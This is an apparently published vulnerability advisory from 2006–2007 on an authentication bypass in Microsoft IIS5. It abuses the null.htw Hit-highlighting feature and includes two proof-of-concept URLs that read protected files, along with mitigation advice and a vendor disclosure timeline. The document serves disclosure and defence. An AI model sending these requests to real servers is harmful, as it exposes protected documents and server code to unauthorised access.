isa-2006-013.txt

`=============================================  
INTERNET SECURITY AUDITORS ALERT 2006-013  
- Original release date: December 15, 2006  
- Last revised: May 22, 2007  
- Discovered by: Jesus Olmos Gonzalez  
- Severity: 5/5  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Microsoft IIS5 NTLM and Basic authentication bypass  
  
II. BACKGROUND  
-------------------------  
Microsoft Internet Information Server Web Server can protect the  
private contents with a basic or NTLM authentication.  
  
Many web pages, intranets and extranets rely on Microsoft security.  
  
IISv5 has a "Hit-highlighting" functionality that opens some site  
object and highlights some part of it; that has had a transversal  
vulnerability in the past. Now it can be used to bypass the IIS  
authentication.  
  
This is poorly documented at KnowledgeBase  
http://support.microsoft.com/kb/328832, the real impact is detailed above.  
  
III. DESCRIPTION  
-------------------------  
Any Internet user can access the private web directories and files of  
any IISv5 web, by highlighting it with "Hit-highlighting". To use this  
functionality the user has to supply the CiWebhitsfile parameter to  
the null.htw object.  
  
The null.htw object has to be accessed from a non-existant directory,  
for example http://anyiisweb.com/foo/null.htw  
  
It is possible to use null.htw or other object specified at the  
CiTemplate template.  
  
IV. PROOF OF CONCEPT  
-------------------------  
https://anyiis5.com/authBypass/null.htw?CiWebhitsfile=/protectedfile.aspx&CiRestriction=b&CiHiliteType=full  
https://anyiis5.com/authBypass/null.htw?CiWebhitsfile=/some/secretfile.txt&CiRestriction=b&CiHiliteType=full  
  
V. BUSINESS IMPACT  
-------------------------  
The impact depends on the web contents. Attackers could gain access to  
all protected documents, and ASP code.  
  
When an attacker accesses a trusted zone, the probability to get  
command execution is higher.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Internet Information Services Version 5, any Service Pack.  
  
VII. SOLUTION  
-------------------------  
Protect the files from the NTFS filesystem instead of relying on the  
IIS protection.  
  
Microsoft recommends not to use IISv5 and update to IISv6.  
  
VIII. REFERENCES  
-------------------------  
http://support.microsoft.com/kb/328832  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported  
by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com)  
  
X. REVISION HISTORY  
-------------------------  
December 15, 2006: Initial release  
March 19, 2007: Latest revision  
March 27, 2007: First notification to the vendor.  
Response: under revision.  
April 11, 2007: The vendor considers little changes in their KB.  
April 12, 2007: We accept it and propose add comments about the  
severity of the problem. Rejected by vendor.  
May 21, 2007: Published. As the publish information is  
considered really not detailed.  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
December 15, 2006: Vulnerability acquired by  
Jesus Olmos Gonzalez (Internet Security Auditors)  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors, S.L. accepts no responsibility for any  
damage caused by the use or misuse of this information.  
`